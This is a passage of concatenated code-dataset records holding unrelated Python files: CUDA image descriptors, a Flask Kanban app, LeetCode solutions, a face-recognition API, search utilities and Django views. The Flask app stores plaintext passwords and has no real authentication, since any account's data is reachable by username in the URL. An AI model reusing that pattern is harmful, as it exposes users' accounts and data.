[]\n\t\tfor bias_x in (range(-2,3)):\n\t\t\tfor bias_y in range(-2,3):\n\t\t\t\tif abs(bias_x)+abs(bias_y) == 3 or abs(bias_x)+abs(bias_y) == 0 :\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tcoordinate_x = bias_x+base_x\n\t\t\t\t\tcoordinate_y = bias_y+base_y\n\t\t\t\t\tflag = 0\n\t\t\t\t\tif coordinate_x >= 0 and coordinate_y >= 0 and coordinate_x < width and coordinate_y < height :\n\t\t\t\t\t\tif abs(img[base_y,base_x]-img[coordinate_y,coordinate_x]) <= img[base_y,base_x]*Tr :\n\t\t\t\t\t\t\tflag = 1\n\t\t\t\t\t#lbsp_value = lbsp_value + flag*(2**run_idx)\n\t\t\t\t\t#run_idx 
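# --- editor's note: hedged illustration, not part of the original file ---
# lbsp_pixel() above packs one boolean per neighbour into an integer with
# value = (value << 1) + flag, building up the 16-bit LBSP descriptor. The
# accumulation pattern in isolation:
flags = [1, 0, 1, 1]
value = 0
for f in flags:
    value = (value << 1) + f                   # append f as the lowest bit
assert value == 0b1011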
= run_idx - 1\n\t\t\t\t\tlbsp_value = (lbsp_value << 1) + flag\t\n\t\t\t\t\tbins.append(flag)\n\t\tprint(\"value:\",lbsp_value,\"bins:\",bins)\t\t\t\n\t\treturn lbsp_value\n\n'''\n\t- claculating one image`s lbsp values\n\t- lbsp values save in parameter values\n'''\n#@timer\ndef compute_lbsp_without_GPU(img,values):\n\t\t(height, width) = img.shape\n\t\tfor w in range(width):\n\t\t\tfor h in range(height):\n\t\t\t\tvalues[h,w] = lbsp_pixel(img,w,h)\n\n\nlbsp_pixel_for_gpu = cuda.jit(device=True)(lbsp_pixel)\n@cuda.jit\ndef lbsp_gpu_kernel(img,values):\n\theight = img.shape[0]\n\twidth = img.shape[1]\n\tabs_X,abs_Y = cuda.grid(2)\n\tif abs_X < width and abs_Y < height:\n\t\tvalues[abs_Y,abs_X] = lbsp_pixel_for_gpu(img,abs_X,abs_Y)\n\t'''\n\tstartX, startY = cuda.grid(2)\n\tgridX = cuda.gridDim.x * cuda.blockDim.x;\n\tgridY = cuda.gridDim.y * cuda.blockDim.y;\n\tfor x in range(startX, width, gridX):\n\t\tfor y in range(startY, height, gridY): \n\t#x,y = cuda.grid(2)\n\t#if x < width and y < height:\n\t\t\tvalues[y,x] = lbsp_pixel_for_gpu(img,x,y)\n\t\t\t#values[y,x] = lbsp_pixel(img,x,y)\n\t'''\n\n#@timer\ndef compute_lbsp_with_GPU(img,values,blockdim,griddim):\n\tlbsp_gpu_kernel[griddim, blockdim](img,values)\n\n\n\ndef compute_lbsp_gpu(img,values):\n\tlbsp_gpu_kernel[GRIDDIM, BLOCKDIM](img,values)\n\n\t\n\n\"\"\"\nif __name__ == '__main__':\n\n\tnp.random.seed(0)\n\timage = np.random.randint(1,10,(10,10))\n\tlbsp_values = np.zeros(image.shape,dtype=np.uint16)\n\n\t#compute_lbsp_without_GPU(image,lbsp_values)\n\tcompute_lbsp_with_GPU(image,lbsp_values)\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\n\tdef compute_one_pixel_lbsp_value(img,coor_x,coor_y,tr = Tr):\n\t\twidth, height = img.shape\n\t\tit = [x for x in list(range(-2,3)) ]\n\t\tneighbor_coordinates = [(x[0]+coor_x,x[1]+coor_y) for x in itertools.product(it,it) \n\t\t\t\t\t\t\t\tif abs(x[0]*x[1])!=2 and (abs(x[0])+abs(x[1])!=0)]\n\n\t\tneighbor_values = [img[coordinate] if coordinate[0]>=0 and coordinate[1]>=0 \n\t\t\t\t\t\t\tand coordinate[0]=0 and coordinate[1]>=0 and coordinate[0]\")\ndef home(username):\n user = User.query.filter_by(Username=username).first()\n lists = List.query.filter_by(UserID=user.UserID).all()\n if lists==[]:\n return render_template(\"nolists.html\",username = user.Username)\n else:\n c_cards = Card.query.filter_by(UserID=user.UserID, Complete=\"1\")\n d_cards = Card.query.filter_by(UserID=user.UserID, Complete=\"0\")\n return render_template(\"home.html\",username = user.Username, lists = lists, dcards = d_cards, ccards = c_cards)\n\n@app.route(\"/signup\", methods = ['GET','POST'])\ndef signup():\n if request.method == 'GET':\n return render_template(\"signup.html\")\n elif request.method == 'POST':\n \tif '@' not in request.form['email']:\n \t\treturn render_template('invalidentries.html')\n \ttemp = User.query.filter_by(Username = request.form['username']).first()\n \tif temp == None:\n \t\tnewuser = User(Username = request.form['username'], EmailID = request.form['email'], Password = request.form['password'])\n \t\tdb.session.add(newuser)\n \t\tdb.session.commit()\n \t\treturn redirect(url_for(\"home\", username = request.form['username']))\n \telse:\n \t\treturn render_template(\"userexists.html\")\n\n@app.route(\"/login\", methods = ['GET','POST'])\ndef login():\n if request.method == 'GET':\n return render_template(\"login.html\")\n elif request.method == 'POST':\n temp = User.query.filter_by(Username = request.form['username'], Password = request.form['password']).first()\n if 
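# --- editor's note: hedged illustration, not part of the original file ---
# lbsp_gpu_kernel above maps one CUDA thread to one pixel via cuda.grid(2)
# and bounds-checks against the image shape. The skeleton of that mapping:
from numba import cuda

@cuda.jit
def per_pixel(img, out):
    x, y = cuda.grid(2)                        # absolute thread coordinates
    if x < img.shape[1] and y < img.shape[0]:  # guard threads past the edge
        out[y, x] = img[y, x]                  # stand-in for real per-pixel work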
temp==None:\n            return render_template(\"invalidentries.html\")\n        else:\n            return redirect(url_for(\"home\",username=request.form['username']))\n\n@app.route(\"/<username>/addlist\", methods = ['GET','POST'])\ndef addlist(username):\n    if request.method == 'GET':\n        user = User.query.filter_by(Username=username).first()\n        lists = List.query.filter_by(UserID=user.UserID).all()\n        if len(lists)==5:\n            return render_template(\"maxlists.html\",username=username)\n        return render_template(\"addlist.html\",username=username)\n    elif request.method == 'POST':\n        user = User.query.filter_by(Username=username).first()\n        list = List(UserID=user.UserID, Name=request.form['name'], Description=request.form['desc'], Created_time=str(date.today().strftime('%d/%m/%Y')))\n        db.session.add(list)\n        db.session.commit()\n        return redirect(url_for(\"home\",username = username))\n\n@app.route(\"/<username>/editlist/<listid>\", methods=['GET','POST'])\ndef editlist(username,listid):\n    list = List.query.filter_by(ListID=listid).first()\n    if request.method == 'GET':\n        return render_template('editlist.html', username=username, list=list)\n    elif request.method == 'POST':\n        list.Name = request.form['name']\n        list.Description = request.form['desc']\n        db.session.commit()\n        return redirect(url_for('home',username=username))\n\n@app.route(\"/<username>/deletelist/<listid>\")\ndef deletelist(username,listid):\n    if request.method == 'GET':\n        list = List.query.filter_by(ListID = listid).first()\n        cards = Card.query.filter_by(ListID=listid).all()\n        print(cards)\n        if cards == []:\n        \treturn render_template('deletelist3.html', username=username, listid=listid, listname=list.Name)\n        else:\n        \treturn render_template('deletelist1.html',username=username, listid=listid,listname=list.Name)\n\n@app.route(\"/<username>/deletelistandcards/<listid>\")\ndef deletelistandcards(username,listid):\n    cards = Card.query.filter_by(ListID = listid).all()\n    for card in cards:\n        db.session.delete(card)\n        print(card)\n    list = List.query.filter_by(ListID = listid).first()\n    db.session.delete(list)\n    print(\"deleted successfully\")\n    db.session.commit()\n    return redirect(url_for('home',username=username))\n\n@app.route(\"/<username>/movecards/<listid>\", methods=['GET','POST'])\ndef movecards(username, listid):\n    cards = Card.query.filter_by(ListID = listid).all()\n    list = List.query.filter_by(ListID = listid).first()\n    if request.method == 'GET':\n        user = User.query.filter_by(Username = username).first()\n        lists = List.query.filter_by(UserID = user.UserID).all()\n        lists.remove(list)\n        return render_template(\"deletelist2.html\",username=username, listid = listid, cards = cards, lists = lists)\n    elif request.method =='POST':\n        print(\"here\")\n        for card in cards:\n            card.ListID = request.form[str(card.CardID)]\n        db.session.delete(list)\n        print(\"done\")\n        db.session.commit()\n        return redirect(url_for('home',username=username))\n\n@app.route(\"/<username>/<listid>/addcard\", methods=['GET','POST'])\ndef addcard(username, listid):\n    user = User.query.filter_by(Username=username).first()\n    if request.method == 'GET':\n        lists = List.query.filter_by(UserID=user.UserID).all()\n        list = List.query.filter_by(ListID=listid).first()\n        lists.remove(list)\n        lists.insert(0,list)\n        curr_date = str(date.today())\n        return render_template('addcard.html', username=username, lists=lists, curr_date=curr_date)\n    elif request.method == 'POST':\n        time = str(date.today().strftime('%d/%m/%Y'))\n        if request.form['complete'] == \"1\":\n            ctime = time\n        elif request.form['complete'] == \"0\":\n            ctime = None\n        x = (datetime.strptime(request.form['deadline'], 
'%Y-%m-%d').date()).strftime('%d/%m/%Y')\n        newcard = Card(ListID = request.form['listid'], UserID = user.UserID, Title = request.form['title'], Content = request.form['content'], Deadline = x, Complete = request.form['complete'], Created_time = time, Last_updated_time = time, Completed_time = ctime)\n        db.session.add(newcard)\n        db.session.commit()\n        return redirect(url_for('home',username=username))\n\n@app.route(\"/<username>/editcard/<cardid>\", methods=['GET','POST'])\ndef editcard(username,cardid):\n    user = User.query.filter_by(Username=username).first()\n    card = Card.query.filter_by(CardID = cardid).first()\n    if request.method == 'GET':\n        lists = List.query.filter_by(UserID=user.UserID).all()\n        list = List.query.filter_by(ListID=card.ListID).first()\n        lists.remove(list)\n        lists.insert(0,list)\n        curr_date = str(date.today())\n        val = 0\n        if card.Complete == 1:\n            val = 1\n        \n        x = (datetime.strptime(card.Deadline, '%d/%m/%Y').date()).strftime('%Y-%m-%d')\n        return render_template('editcard.html',username=username, card=card, lists=lists, val=val, curr_date = curr_date, ddate = x)\n    elif request.method == 'POST':\n        time = str(date.today().strftime('%d/%m/%Y'))\n        ctime = None\n        if request.form['complete'] == \"1\":\n            ctime = time\n        card.ListID = int(request.form['listid'])\n        card.Title = request.form['title']\n        card.Content = request.form['content']\n        card.Deadline = (datetime.strptime(request.form['deadline'], '%Y-%m-%d').date()).strftime('%d/%m/%Y')\n        card.Complete = str(request.form['complete'])\n        card.Last_updated_time = time\n        card.Completed_time = ctime\n        db.session.commit()\n        return redirect(url_for('home',username=username))\n\n@app.route(\"/<username>/deletecard/<cardid>\", methods=['GET','POST'])\ndef deletecard(username,cardid):\n    card = Card.query.filter_by(CardID=cardid).first()\n    if request.method == 'GET':\n        return render_template('deletecard.html',username=username, card=card)\n    elif request.method == 'POST':\n        db.session.delete(card)\n        db.session.commit()\n        return redirect(url_for('home',username=username))\n\n@app.route(\"/<username>/summary\")\ndef summary(username):\n    user = User.query.filter_by(Username = username).first()\n    lists = List.query.filter_by(UserID = user.UserID).all()\n    count = {}\n    for list in lists:\n        l = {}\n        total_cards = Card.query.filter_by(ListID = list.ListID).all()\n        l['total'] = len(total_cards)\n        completed_cards = Card.query.filter_by(ListID = list.ListID, Complete = '1').all()\n        l['c'] = len(completed_cards)\n        not_completed_cards = Card.query.filter_by(ListID = list.ListID, Complete = '0', ).all()\n        curr_date = str(date.today())\n        l['pd'] = 0\n        l['d'] = 0\n        for card in not_completed_cards:\n        \tx = str(datetime.strptime(card.Deadline, '%d/%m/%Y').date())\n        \tif curr_date > x:\n        \t\tl['pd']+=1\n        \telse:\n        \t\tl['d']+=1\n        count[list.ListID] = l\n\n        dates = []\n        completed_card_count = []\n        start_date = datetime.strptime(list.Created_time, '%d/%m/%Y').date()\n        end_date = datetime.strptime(str(date.today().strftime('%d/%m/%Y')), '%d/%m/%Y').date()\n        for x in daterange(start_date, end_date):\n            x = x.strftime('%d/%m/%Y')\n            dates.append(x[:5])\n            cc = Card.query.filter_by(ListID=list.ListID, Completed_time = x).all()\n            completed_card_count.append(len(cc))\n\n        fig = plt.figure()\n        fig.add_subplot(111)\n        plt.bar(dates, completed_card_count)\n        plt.savefig(\"static/\"+str(list.ListID)+\"_graph.png\")\n        \n    return render_template(\"summary.html\",username=username, lists=lists, count=count)\n\n\n\n@app.route(\"/<username>/overallsummary\")\ndef overallsummary(username):\n    user = User.query.filter_by(Username 
= username).first()\n    lists = List.query.filter_by(UserID = user.UserID).all()\n    start_date=(datetime.strptime(lists[0].Created_time, '%d/%m/%Y').date())\n    \n    for list in lists:\n    \tx = (datetime.strptime(list.Created_time, '%d/%m/%Y').date())\n    \tif x < start_date:\n    \t\tstart_date = x\n    start_date = start_date.strftime('%d/%m/%Y')\n\n    dates = []\n    completed_card_count = []\n    start_date = datetime.strptime(start_date, '%d/%m/%Y').date()\n    end_date = datetime.strptime(str(date.today().strftime('%d/%m/%Y')), '%d/%m/%Y').date()\n    for x in daterange(start_date, end_date):\n        x = x.strftime('%d/%m/%Y')\n        dates.append(x[:5])\n        cc = Card.query.filter_by(UserID=user.UserID, Completed_time = x).all()\n        completed_card_count.append(len(cc))\n\n    fig = plt.figure()\n    fig.add_subplot(111)\n    plt.bar(dates, completed_card_count)\n    plt.savefig(\"static/overall.png\")\n    \n    return render_template(\"overallsummary.html\",username=username)\n\n@app.route(\"/account/<username>\")\ndef account(username):\n\tuser = User.query.filter_by(Username = username).first()\n\treturn render_template(\"account.html\",username=username, user=user)\n\n@app.route(\"/editaccount/<username>\", methods=['GET','POST'])\ndef editaccount(username):\n\tuser = User.query.filter_by(Username = username).first()\n\tif request.method == 'GET':\n\t\treturn render_template(\"editaccount.html\",username=username, user=user)\n\telif request.method == 'POST':\n\t\tif '@' not in request.form['email']:\n\t\t\treturn render_template('invaliddetails.html', username=username)\n\t\tuser.EmailID = request.form['email']\n\t\tuser.Password = request.form['password']\n\t\tdb.session.commit()\n\t\treturn redirect(url_for('account',username=username))\n\n@app.route(\"/deleteaccount/<username>\", methods=['GET','POST'])\ndef deleteaccount(username):\n\tif request.method == 'GET':\n\t\treturn render_template(\"deleteaccount.html\",username=username)\n\telif request.method == 'POST':\n\t\tuser = User.query.filter_by(Username = username).first()\n\t\tdb.session.delete(user)\n\t\tdb.session.commit()\n\t\treturn redirect(url_for('main'))\n\n@app.route(\"/logout\")\ndef logout():\n    return redirect(url_for('main'))\n\n\n","repo_name":"Donajose5/Kanban-Board-Application","sub_path":"application/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":12143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74028520108","text":"# -*- coding: utf-8 -*-\n\n# Count how often characters of the short string appear in the long string\n# First solution\n# Loop over the long string and check whether each character appears in the short string\n# If it does, add 1 to the count; the final count is the total number of occurrences\nclass Solution(object):\n    def numJewelsInStones(self, J, S):\n        count = 0\n        ListJ = list(J)\n        for i in S:\n            if i in ListJ:\n                count += 1\n        return count\n\nsolution = Solution()\nprint(solution.numJewelsInStones('adfKJNFi', 'aoifejfkmaklnmvklksdjfKLJKJDSLKJLjkl'))\n\n\n# Second solution\n# \nclass Solution2(object):\n    def numJewelsInStones2(self, J, S):\n        for i in (s in J for s in S):\n            print(i)\n        return sum(s in J for s in S)\n\nsolution2 = Solution2()\nprint(solution2.numJewelsInStones2('adfKJNFi', 'aoiejfkmaklnmvklksdjfKLJKJDSLKJLjkl'))\n\n\n# Third solution\n# Use a Python set, where x in s has an optimal time complexity of O(1)\n# \nclass Solution3(object):\n    def numJewelsInStones3(self, J, S):\n        setJ = set(J)\n        return sum(s in setJ for s in S)\n\n# Fourth solution\n# Use a list comprehension to iterate over the long string and test whether each character is in the short string\n# Collect the matching characters into a list\nclass Solution4(object):\n    def numJewelsInStones4(self, J, S):\n        print(type([stone for stone in S if stone in J]))\n        return len([stone for stone in S if stone in J])\nsolution4 = 
Solution4()\nprint(solution4.numJewelsInStones4('adfKJNFi', 'aoiejfkmaklnmvklksdjfKLJKJDSLKJLjkl'))\n\n","repo_name":"Dxigui/Myleetcode","sub_path":"Easy/jewel_and_stone.py","file_name":"jewel_and_stone.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34769386000","text":"import web\n#from models import login\nimport models.CreateStudent\nimport models.GetStudent\n\nimport cv2\nimport os\nimport numpy as np\nimport faceRecognition as fr\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\n\nurls = (\n '/student/create', 'Create',\n '/student/get', 'Get'\n)\napp = web.application(urls, globals())\n\n\nclass Create:\n def POST(self):\n data = web.input()\n print(data)\n student_model = models.CreateStudent.create()\n student_model.insert_student(data)\n return data\n\nclass Get:\n def POST(self):\n data = web.input()\n fp=data.image\n print(data.image)\n print(type(data.image))\n f=open(\"input.jpg\",\"wb\")\n f.write(data.image)\n f.close()\n\n test_img=cv2.imread(\"input.jpg\")\n print(test_img)\n\n faces_detected,gray_img=fr.recognizer.faceDetection(test_img)\n print(\"faces_detected:\",faces_detected)\n print(\"faces_detected:\",type(faces_detected) is tuple)\n if (type(faces_detected) is tuple):\n return {'error': 'Face not detected'}\n face_recognizer=cv2.face.LBPHFaceRecognizer_create()\n face_recognizer.read('trainingData2.yml')\n # name = {0 : \"'Priyanka'\",1 : \"'Kangana'\",2:\"'Akan'\",3:\"'Kayode'\"}\n # name = {0 : \"'Jackie'\",1 : \"'Priyanka'\",2:\"'Kayode'\"}\n name = {0 : \"Jackie\",1 : \"Priyanka\",2:\"Kayode\"}\n\n for face in faces_detected:\n (x,y,w,h)=face\n roi_gray=gray_img[y:y+h,x:x+w]\n print('w is: ',w,'h is: ',h)\n cv2.imwrite('face.jpg', roi_gray)\n cv2.imwrite('roi_gray.jpg', roi_gray)\n label,confidence=face_recognizer.predict(roi_gray)\n print(\"confidence:\",confidence)\n print(\"label:\",label)\n predicted_name=name[label]\n if(confidence>38):\n return {'error': 'Student is not verified'}\n fr.recognizer.resultImage(test_img,face,predicted_name)\n\n student_model = models.GetStudent.get()\n student = student_model.get_student(predicted_name)\n if student:\n return student\n print(\"error!\")\n return \"error\"\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"Kaykeks1/FacialRecognition-API","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38805427095","text":"import sys\nimport time\nimport os.path\n\ndef bruteForce(file, pattern):\n matches = []\n #for each line\n for index, line in enumerate(file):\n #compare the line with the pattern\n for i in range(len(line)-len(pattern)):\n for j in range(len(pattern)):\n #if it's different then we move to the next character\n if line[i+j] != pattern[j]:\n break \n if j == (len(pattern)-1):\n print('Pattern found: '+ str([index, i]))\n matches.append([index, i])\n return matches \n\ndef main():\n\n fileName = sys.argv[1]\n file=open(fileName, \"r\")\n\n pattern = sys.argv[2]\n\n time_start = time.process_time()\n pos=bruteForce(file, pattern)\n time_elapsed = time.process_time()\n #If file exists we append the result, if not we create it and write the measure of time\n if os.path.exists('measures.txt'):\n f= open(\"measures.txt\",\"a+\")\n else:\n f= open(\"measures.txt\",\"w+\")\n\n f.write(\"Algorithm: Naive \\t Time: \"+str(time_elapsed)+\" 
secs \\t Pattern: \" + str(pattern)+\"\\n\")\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"nowrie141/MATD","sub_path":"week2/bruteForce.py","file_name":"bruteForce.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34487353015","text":"#!/usr/bin/env python\n\"\"\"A basic ZMQ echo server with zmq.eventloop.future\"\"\"\n\nfrom tornado import ioloop\n\nimport zmq\nfrom zmq.eventloop.future import Context\n\n\nasync def echo(sock):\n while True:\n msg = await sock.recv_multipart()\n await sock.send_multipart(msg)\n\n\nctx = Context.instance()\ns = ctx.socket(zmq.ROUTER)\ns.bind('tcp://127.0.0.1:5555')\n\nloop = ioloop.IOLoop.current()\nloop.spawn_callback(echo, s)\nloop.start()\n","repo_name":"zeromq/pyzmq","sub_path":"examples/eventloop/echofuture.py","file_name":"echofuture.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":3466,"dataset":"github-code","pt":"37"} +{"seq_id":"19258905241","text":"import torch\nimport torch.nn as nn\n\nfrom smolai.callbacks import Callback, before\n\n\ndef init_weights(m: nn.Module):\n if isinstance(m, (nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.Linear)):\n torch.nn.init.kaiming_normal_(m.weight)\n\n\nclass InitWeights(Callback):\n \"\"\"Use Kaiming initialization for all layers in the model and scale\n the input apropriately.\n\n See: https://colab.research.google.com/drive/1J1E5a_WtZ2tJt-9MRASxWR_lHqIbDb1G?usp=sharing\"\"\"\n\n @before\n def batch(self, context):\n X, y = context.batch\n X = (X - X.mean()) / X.std()\n context.batch = (X, y)\n\n @before\n def fit(self, context):\n context.model.apply(init_weights)\n","repo_name":"jeremyadamsfisher/smol-ai","sub_path":"smolai/callbacks/weights.py","file_name":"weights.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31666234349","text":"from semantic_search import SemanticSearch\nfrom lexical_search import LexicalSearch\nimport pandas as pd\n\nimport pandas as pd\n\ndef reciprocal_rank_fusion(semantic_rank, lexical_rank, k):\n\n for rank, (key, value) in enumerate(semantic_rank.items()):\n score = 1 / (rank + 60)\n semantic_rank[key] = {\"value\": value, \"score\": score}\n\n for rank, (key, value) in enumerate(lexical_rank.items()):\n score = 1 / (rank + 60)\n lexical_rank[key] = {\"value\": value, \"score\": score}\n\n summed_scores_dict = {}\n\n for key in set(semantic_rank.keys()) | set(lexical_rank.keys()):\n score1 = semantic_rank.get(key, {'score': 0})['score']\n score2 = lexical_rank.get(key, {'score': 0})['score']\n\n summed_score = score1 + score2\n\n summed_scores_dict[key] = {'score': summed_score}\n\n reciprocal_rank_fusion = dict(sorted(summed_scores_dict.items(), key=lambda item: item[1]['score'], reverse=True))\n\n return reciprocal_rank_fusion\n\ndf = pd.read_csv('data_halodoc_ordered.csv')\ncorpus = df['uses'].to_list()\nquery = \"susu untuk ibu hamil\"\nlexical_model = LexicalSearch()\nlexical_rank = lexical_model.rank(corpus, query)\nsemantic_model = SemanticSearch()\nsemantic_model.load_pretrained()\nsemantic_rank = semantic_model.rank(corpus, query)\nfusion_rank = reciprocal_rank_fusion(semantic_rank, lexical_rank, 60)\n\ncorpus_id = list(fusion_rank.keys())\nfor id in corpus_id[:10]:\n print(corpus[id])\n 
print(\"=====================================================\")\n\n","repo_name":"projectwilsen/ProjectRekomendasiObat","sub_path":"code/hybrid_search.py","file_name":"hybrid_search.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8508949798","text":"from django.shortcuts import render,redirect,get_object_or_404\r\nfrom .models import Arte\r\nfrom .forms import ContactoForm,ArteForm,CustomUserCreationForm\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth import authenticate , login\r\nfrom django.contrib.auth.decorators import login_required,permission_required\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view,permission_classes\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.parsers import JSONParser\r\nfrom django.views.decorators.csrf import csrf_exempt \r\nfrom rest_framework import viewsets\r\nfrom .serializers import ArteSerializer\r\n\r\nfrom rest_framework.authentication import TokenAuthentication\r\nfrom rest_framework.permissions import IsAuthenticated\r\n\r\n\r\n\r\n\r\n# Create your views here.\r\n\r\n\r\n\r\ndef home(request):\r\n artes = Arte.objects.all()\r\n data = {\r\n 'artes': artes\r\n }\r\n return render(request,'app/home.html',data)\r\n\r\ndef contacto(request):\r\n data = {\r\n 'form': ContactoForm()\r\n }\r\n\r\n if request.method == 'POST':\r\n formulario = ContactoForm(data=request.POST)\r\n if formulario.is_valid():\r\n formulario.save()\r\n data[\"mensaje\"] = \"enviado correctamente\"\r\n else:\r\n data[\"form\"] = formulario\r\n return render (request,'app/contacto.html',data)\r\n\r\ndef main_pinturas(request):\r\n return render (request,'app/main_pinturas.html')\r\n\r\ndef Inf_imagen(request):\r\n return render (request,'app/Inf_imagen.html')\r\n\r\ndef Inf_imagen2(request):\r\n return render (request,'app/Inf_imagen2.html')\r\n\r\ndef Inf_imagen3(request):\r\n return render (request,'app/Inf_imagen3.html')\r\n\r\ndef Inf_imagen4(request):\r\n return render (request,'app/Inf_imagen4.html')\r\n\r\ndef main_esculturas(request):\r\n return render (request,'app/main_esculturas.html')\r\n\r\ndef main_orfebreria(request):\r\n return render (request,'app/main_orfebreria.html')\r\n\r\ndef orfebreria1(request):\r\n return render(request,'app/arteshtmls/orfebreriashtml/orfebreria1.html')\r\n\r\ndef orfebreria2(request):\r\n return render(request,'app/arteshtmls/orfebreriashtml/orfebreria2.html')\r\n\r\ndef orfebreria3(request):\r\n return render(request,'app/arteshtmls/orfebreriashtml/orfebreria3.html')\r\n \r\ndef orfebreria4(request):\r\n return render(request,'app/arteshtmls/orfebreriashtml/orfebreria4.html')\r\n \r\ndef escultura1(request):\r\n return render (request,'app/arteshtmls/esculturashtmls/escultura1.html')\r\n\r\ndef escultura2(request):\r\n return render (request,'app/arteshtmls/esculturashtmls/escultura2.html')\r\n\r\ndef ConoceMas(request):\r\n return render (request,'app/ConoceMas.html')\r\n\r\n\r\n@permission_required('core.add_arte')\r\n@login_required\r\ndef agregar_arte(request):\r\n data = {\r\n 'form':ArteForm()\r\n }\r\n if request.method == 'POST':\r\n formulario = ArteForm(data=request.POST)\r\n if formulario.is_valid():\r\n formulario.save()\r\n data[\"mensaje\"] = \"PRODUCTO AGREGADO CORRECTAMENTE\"\r\n else:\r\n data[\"form\"] = formulario\r\n return render(request,'app/artes/agregar.html',data)\r\n\r\n@permission_required('core.view_arte')\r\ndef 
listar_artes(request):\r\n artes = Arte.objects.all()\r\n\r\n data = {\r\n 'artes':artes\r\n }\r\n return render(request,'app/artes/listar.html',data)\r\n\r\n@permission_required('core.change_arte')\r\ndef mod_arte(request,id):\r\n arte = Arte.objects.get(idprod=id)\r\n data = {\r\n 'form': ArteForm(instance=Arte)\r\n }\r\n if request.method=='POST':\r\n formulario=ArteForm(data=request.POST, instance=arte)\r\n if formulario.is_valid():\r\n formulario.save()\r\n messages.success(request,\"MODIFICADO CORRECTAMENTE\")\r\n return redirect(to=\"listar_artes\")\r\n data[\"form\"]=formulario\r\n return render(request,'app/artes/mod.html',data)\r\n\r\n@permission_required('core.delete_arte')\r\ndef del_arte(request, id):\r\n arte = Arte.objects.get(idprod=id)\r\n arte.delete()\r\n messages.success(request,\"ELIMINADO CORRECTAMENTE\")\r\n return redirect(to=\"listar_artes\")\r\n\r\ndef registro(request):\r\n data = {\r\n 'form':CustomUserCreationForm\r\n }\r\n if request.method == 'POST':\r\n formulario = CustomUserCreationForm(data=request.POST)\r\n if formulario.is_valid():\r\n formulario.save()\r\n User = authenticate(username=formulario.cleaned_data[\"username\"],password=formulario.cleaned_data[\"password1\"])\r\n login(request,User)\r\n messages.success(request,\"REGISTRADO CORRECTAMENTE\")\r\n return redirect(to=home)\r\n data[\"form\"]\r\n return render(request,'registration/registro.html',data)\r\n\r\n@csrf_exempt\r\n@api_view(['GET','POST'])\r\n@permission_classes((IsAuthenticated,))\r\ndef lista_artes(request):\r\n if request.method == 'GET':\r\n arte = Arte.objects.all()\r\n serializer = ArteSerializer(arte,many=True)\r\n return Response(serializer.data)\r\n elif request.method == 'POST':\r\n data = JSONParser().parse(request)\r\n serializer = ArteSerializer(data=data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n else:\r\n return Response(serializer.errors,status==status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['GET','PUT','DELETE'])\r\n@permission_classes((IsAuthenticated,))\r\ndef detalle_arte(request,id):\r\n try:\r\n arte= Arte.objects.get(idprod=id)\r\n except Arte.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n if request.method == 'GET':\r\n serializer = ArteSerializer(arte)\r\n return Response(serializer.data)\r\n if request.method == 'PUT':\r\n data = JSONParser().parse(request)\r\n serializer = ArteSerializer(arte,data=data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n else:\r\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\r\n elif request.method == 'DELETE':\r\n arte.delete()\r\n return Response(status=status.HTTP_204_NO_CONTENT)\r\n\r\n@csrf_exempt\r\n@api_view(['GET','POST'])\r\n@permission_classes((IsAuthenticated,))\r\ndef lista_artes(request):\r\n if request.method == 'GET':\r\n arte = Arte.objects.all()\r\n serializer = ArteSerializer(arte,many=True)\r\n return Response(serializer.data)\r\n elif request.method == 'POST':\r\n data = JSONParser().parse(request)\r\n serializer = ArteSerializer(data=data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n else:\r\n return Response(serializer.errors,status==status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['GET','PUT','DELETE'])\r\n@permission_classes((IsAuthenticated,))\r\ndef detalle_arte(request,id):\r\n try:\r\n arte= Arte.objects.get(idprod=id)\r\n except 
